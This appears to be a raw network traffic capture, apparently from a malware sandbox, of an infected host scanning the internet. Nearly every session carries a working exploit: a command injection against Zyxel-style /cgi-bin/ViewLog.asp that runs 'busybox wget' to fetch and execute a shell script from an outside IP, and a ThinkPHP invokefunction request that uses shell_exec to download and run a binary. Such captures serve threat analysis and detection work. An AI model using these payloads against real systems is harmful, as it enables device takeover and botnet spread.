                                                        Feb 14, 2024 09:34:48.439698935 CET41INData Raw: 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a
                                                        Data Ascii: X-Frame-Options: SAMEORIGIN
                                                        Feb 14, 2024 09:34:48.439713955 CET44INData Raw: 58 2d 58 53 53 2d 50 72 6f 74 65 63 74 69 6f 6e 3a 31 3b 20 6d 6f 64 65 3d 62 6c 6f 63 6b 0d 0a
                                                        Data Ascii: X-XSS-Protection:1; mode=block
                                                        Feb 14, 2024 09:34:48.439728022 CET44INData Raw: 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 6e 6f 73 6e 69 66 66 0d 0a
                                                        Data Ascii: X-Content-Type-Options:nosniff
                                                        Feb 14, 2024 09:34:48.439743042 CET30INData Raw: 46 65 61 74 75 72 65 2d 50 6f 6c 69 63 79 3a 20 0d 0a
                                                        Data Ascii: Feature-Policy:
                                                        Feb 14, 2024 09:34:48.439758062 CET71INData Raw: 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61 69 6e 73 0d 0a
                                                        Data Ascii: Strict-Transport-Security: max-age=300; includeSubDomains
                                                        Feb 14, 2024 09:34:48.439771891 CET40INData Raw: 58 2d 44 6f 77 6e 6c 6f 61 64 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 6f 70 65 6e 0d 0a
                                                        Data Ascii: X-Download-Options: noopen
                                                        Feb 14, 2024 09:34:48.439788103 CET351INData Raw: 58 2d 50 65 72 6d 69 74 74 65 64 2d 43 72 6f 73 73 2d 44 6f 6d 61 69 6e 2d 50 6f 6c 69 63 69 65 73 3a 20 6d 61 73 74 65 72 2d 6f 6e 6c 79 0d 0a 52 65 66 65 72 72 65 72 2d 50 6f 6c 69 63 79 3a 20 6e 6f 2d 72 65 66 65 72 72 65 72 2d 77 68 65 6e 2d
                                                        Data Ascii: X-Permitted-Cross-Domain-Policies: master-onlyReferrer-Policy: no-referrer-when-downgradeLast-Modified: Location: https://112.207.118.153<html><head></head><body>This document has moved to a new <a href="https://112.207.118.153">


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        801192.168.2.145930462.100.146.1498080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:48.151202917 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        802192.168.2.145900085.227.88.2278080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:48.158142090 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        803192.168.2.144925094.120.251.58080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:48.180171967 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        804192.168.2.143974062.29.120.1118080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:48.183353901 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        805192.168.2.145540495.209.135.148080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:48.188293934 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        806192.168.2.143526231.164.3.1198080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:48.190673113 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        807192.168.2.143743495.216.44.13480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:48.280563116 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:48.498740911 CET322INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:34:48 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        808192.168.2.143335695.86.87.7580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:48.316487074 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        809192.168.2.144483495.188.78.10880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:48.364633083 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:48.651417017 CET339INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Wed, 14 Feb 2024 08:34:48 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        810192.168.2.145844094.112.8.1788080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:48.375503063 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        811192.168.2.145663294.120.54.1618080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:48.425940037 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        812192.168.2.143952294.121.48.608080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:48.427761078 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        813192.168.2.143622494.131.137.1328080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:48.428458929 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:48.678308010 CET433INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 04:48:58 GMT
                                                        Server: Apache
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        814192.168.2.144877888.221.167.7280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:48.471230030 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:48.661990881 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:34:48 GMT
                                                        Date: Wed, 14 Feb 2024 08:34:48 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 30 62 31 31 37 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 36 38 38 26 23 34 36 3b 62 63 37 37 39 61 39 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;20b11702&#46;1707899688&#46;bc779a94</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        815192.168.2.1440552112.156.178.11680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:48.708292007 CET236INHTTP/1.0 400 Bad Request
                                                        Content-type: text/html
                                                        Date: Wed, 14 Feb 2024 08:34:47 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Unsupported method</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        816192.168.2.143560262.210.232.1468080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:50.650638103 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:50.845608950 CET134INHTTP/1.1 403 Forbidden
                                                        Content-Type: application/json;charset=utf-8
                                                        Content-Length: 0
                                                        Server: Jetty(9.1.z-SNAPSHOT)


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        817192.168.2.146077031.136.231.1938080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:50.677782059 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:51.396697998 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:52.804647923 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:55.588550091 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:01.220345020 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:12.483819008 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:36.546832085 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        818192.168.2.145932462.29.40.1268080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:50.703583002 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
